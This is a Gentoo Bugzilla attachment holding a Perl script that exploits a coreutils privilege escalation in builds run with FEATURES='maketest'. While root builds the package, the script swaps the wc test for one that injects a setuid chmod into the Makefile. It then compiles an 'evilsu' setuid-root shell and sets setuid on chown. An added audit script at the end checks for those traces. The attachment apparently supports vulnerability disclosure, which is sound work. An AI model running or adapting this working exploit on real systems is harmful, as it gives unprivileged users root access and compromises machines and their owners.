Gentoo's Bugzilla – Attachment 79866 Details for Bug 122951
sys-apps/coreutils: privilege escalation with FEATURES="maketest"
Automated exploit of privilege escalation vulnerability
coreutils test vulnerability exploit.pl (text/plain), 5.91 KB, created by Joshua Pettett on 2006-02-15 12:23:18 UTC
#!/usr/bin/perl
###############################################################################
####    !!! WARNING !!! WARNING !!! WARNING !!! WARNING !!! WARNING !!!    ####
####                                                                       ####
#### THIS SCRIPT *WILL* DAMAGE YOUR SYSTEM'S SECURITY AND MAY WREAK HAVOC. ####
####                                                                       ####
#### USE ONLY IN AN EXPENDABLE AND EXTERNALLY SECURED EXPERIMENTAL SYSTEM. ####
####                                                                       ####
####                              CUTVEX v0.1                              ####
####                   Copyright (C) Joshua Pettett 2006                   ####
#### Permission granted to use, modify, and reproduce solely for the       ####
#### purpose of diagnosing security vulnerabilities on systems over which  ####
#### the user legally has full authority. All other uses are prohibited.   ####
###############################################################################
#
# Automated exploit of privilege escalation vulnerability in coreutils emerge with FEATURES="maketest".
#
# Assumes typical system with sandboxing, perl, gcc, etc. Adjust script if needed to fit specific system.
# Also assumes sufficient processor speed (500MHz?). Increase sleep times if script outruns emerge.
#
# Usage:
# 1. As *unprivileged* user run this script:
#
#       perl -W coreutils\ test\ vulnerability\ exploit.pl
#
# 2. As *root*, emerge coreutils with FEATURES="maketest":
#
#       FEATURES="maketest" emerge --oneshot coreutils
#
# 3. After emerge completes, if "all goes well", the *unprivileged* user will have a *root* shell
#
#
# Of course, this is just one example of the many ways this vulnerability can be exploited.


# Make sure these match your system; defaults should work on most systems:

# Whether or not to attempt to obtain a root shell for unprivileged user. MAY WREAK HAVOC.
$dosu = 1;
# Whether or not to attempt to clean up after ourselves. RESULTS MAY VARY. MAY MAKE THINGS WORSE ON UNUSUAL SYSTEMS. Leaving enabled will sort of mute the emotional effect of the exploit if $dosu = 0
$revertsystem = 1;
# Adjust this regex to match your system's ps ax output for ebuild process; submatches are version and mode
$ebuildjob = qr'\[coreutils-(.*?)\] sandbox /usr/lib/portage/bin/ebuild.sh (\w+)';
# Where to put the evilsu binary if $dosu = 1
$evilsu = glob "~/evilsu";
# Base directory of portage build files
$builddir = "/var/tmp/portage";
# Absolute path of chmod and chown binaries (must NOT be symlinks)
$chmod = "/bin/chmod";
$chown = "/bin/chown";
# GCC c++ compiler command
$cpp = "g++";
# Shell (duh? :))
$shell = "/bin/bash";


# Really exploit
$< or $> or die "Login as a non-root user to see the effects of this exploit.\n";

# Give status updates
$| = 1;
print "\033[31;1mWARNING: THIS SCRIPT *WILL* DAMAGE YOUR SYSTEM'S SECURITY AND MAY WREAK HAVOC! You have been warned!\033[37;1m\n";
print "This entire process may take dozens of minutes, please be patient.\n\n";
print "Waiting for tests to begin...\n";

# Monitor process condition
my $tampered = 0;
while ($_ = `ps ax`) {
    sleep 15; # Make sure we don't query (load) or react (race condition) too fast

    # See what we're doing now
    if (/$ebuildjob/) {
        ($ver, $mode) = ($1, $2);
    } else {
        $mode = "not running";
    }

    print "Emerge now in '$mode' mode.\n" unless $oldmode and $mode eq $oldmode;
    $oldmode = $mode;

    # Before tampering, when emerge enters test mode
    if (!$tampered and $mode and $mode eq "test") {
        $ver =~ /(^(.+?)(-r\d+)?$)/;
        ($ebuildver, $packagever) = ($1, $2);
        $packagever = $2;

        # Replace wc test (exploiting last test gives greatest time margin); in theory, we could modify the test, but at this point, who cares if wc doesn't work right :-)
        print "\n\aChanging '$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests'\n\n";
        unlink "$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests";
        open TEST, ">$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests";

        print TEST '#!/bin/bash
perl -e \'$_ = join "", <STDIN>;
s^(.*?\ninstall-exec-local:.*?fi\n)(\n+uninstall-local:.*)^$1\tchmod ug+s \$\(DESTDIR\)\$\(bindir\)/chmod\n$2^s;
print $_\' < ../../src/Makefile > Makefile.new
mv Makefile.new ../../src/Makefile
exit
';
        close TEST;
        chmod 0755, "$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests";

        print "Waiting for emerge to complete...\n";
        $tampered++;
    }

    # After tampering, when emerge ends
    if ($tampered and $mode eq 'not running') {
        sleep 30; # Give ourselves more time for good measure; ebuild regex stops matching before emerge is complete.
        # Check and output the result
        print "\n\als says: ".`ls -la $chmod`;
        if (`find $chmod -perm -6001`) {
            print "Exploit appears to have succeeded!\n";
        } else {
            die "\nExploit appears to have failed (check that FEATURES=\"maketest\" and that '$chmod' was installed by the latest emerge of coreutils)!\n";
        }

        # Try to make it to a root shell if desired
        if ($dosu) {
            print "\nAttempting to obtain root shell...\n";

            # Try to make ourselves a nice evil su
            open CPP, "|$cpp -x c++ -o $evilsu -";
            print "\nMaking an \"evilsu\".\n";
            print CPP "#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>

int main() {
    setuid(0);
    system(\"$shell\");
}
";
            close CPP;

            # Set some permissions
            print "Setting some AWFUL permissions. :-D\n";
            `$chmod ug+s $chown`;
            `$chown 0:0 $evilsu`;
            `$chmod 6755 $evilsu`;

            # And go to town!!!
            print "And: ";
            `$evilsu`;

            # Clean up if desired
            if ($revertsystem) {
                unlink $evilsu;
                `$chmod ug-s $chown`;
                # Will take care of chmod below
            }
        }

        # Try to remove suid and sgid from chmod if desired
        `$chmod ug-s $chmod` if $revertsystem;

        print "\nDone.\nMake sure '$chmod'".($dosu?", '$chown', and '$evilsu' are":'is')." cleaned up!\n";

        # We're done.
        last;
    }
}
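As an added administrator's check (not part of the attachment or of portage), this audit looks for the two marks the technique above leaves on a system: setuid or setgid bits on coreutils binaries, which coreutils does not install with such bits, and a chmod with a setuid/setgid mode spliced into a Makefile install rule under the build tree. It assumes POSIX sh with find and grep -E; the binary list, the --run flag and the default paths /bin and /var/tmp/portage (taken from the script's settings) are my choices.

```shell
#!/bin/sh
# Administrator-side audit for the two marks this attachment's technique leaves
# behind. Added example, not part of the attachment or of portage.

# None of these coreutils programs is installed setuid or setgid, so any such
# bit on them in DIR (default /bin) is a finding. The POSIX test operators
# -u (setuid) and -g (setgid) cover either bit, a broader version of the
# attachment's own "find ... -perm -6001" check. Returns 0 when clean, 1 otherwise.
audit_setuid() {
    dir=${1:-/bin}
    found=0
    for name in chmod chown chgrp cp install mv rm; do
        f="$dir/$name"
        [ -f "$f" ] || continue
        if [ -u "$f" ] || [ -g "$f" ]; then
            printf 'finding: %s carries setuid/setgid bits\n' "$f"
            found=1
        fi
    done
    return $found
}

# Look through the build tree (default /var/tmp/portage) for Makefiles whose
# rules run chmod with a setuid/setgid mode, symbolic ("ug+s") or four-digit
# octal (2xxx, 4xxx, 6xxx). That is the line the attachment splices into
# src/Makefile's install-exec-local target during the test phase. Review a hit
# rather than acting on it automatically: a few packages do install setuid
# programs legitimately. Returns 0 when clean, 1 on a hit.
scan_makefiles() {
    builddir=${1:-/var/tmp/portage}
    hits=$(find "$builddir" -type f -name 'Makefile*' -exec grep -lE \
        'chmod[[:space:]]+([ugoa]*\+[rwx]*s|[2-7][0-7]{3})' {} + 2>/dev/null) || true
    if [ -n "$hits" ]; then
        printf 'finding: setuid/setgid install rule in %s\n' $hits
        return 1
    fi
    return 0
}

# "sh audit.sh --run [bindir] [builddir]" checks the live system and exits
# non-zero on any finding, suitable for a post-emerge hook or a cron job.
if [ "${1:-}" = "--run" ]; then
    rc=0
    audit_setuid "${2:-/bin}" || rc=1
    scan_makefiles "${3:-/var/tmp/portage}" || rc=1
    exit $rc
fi
```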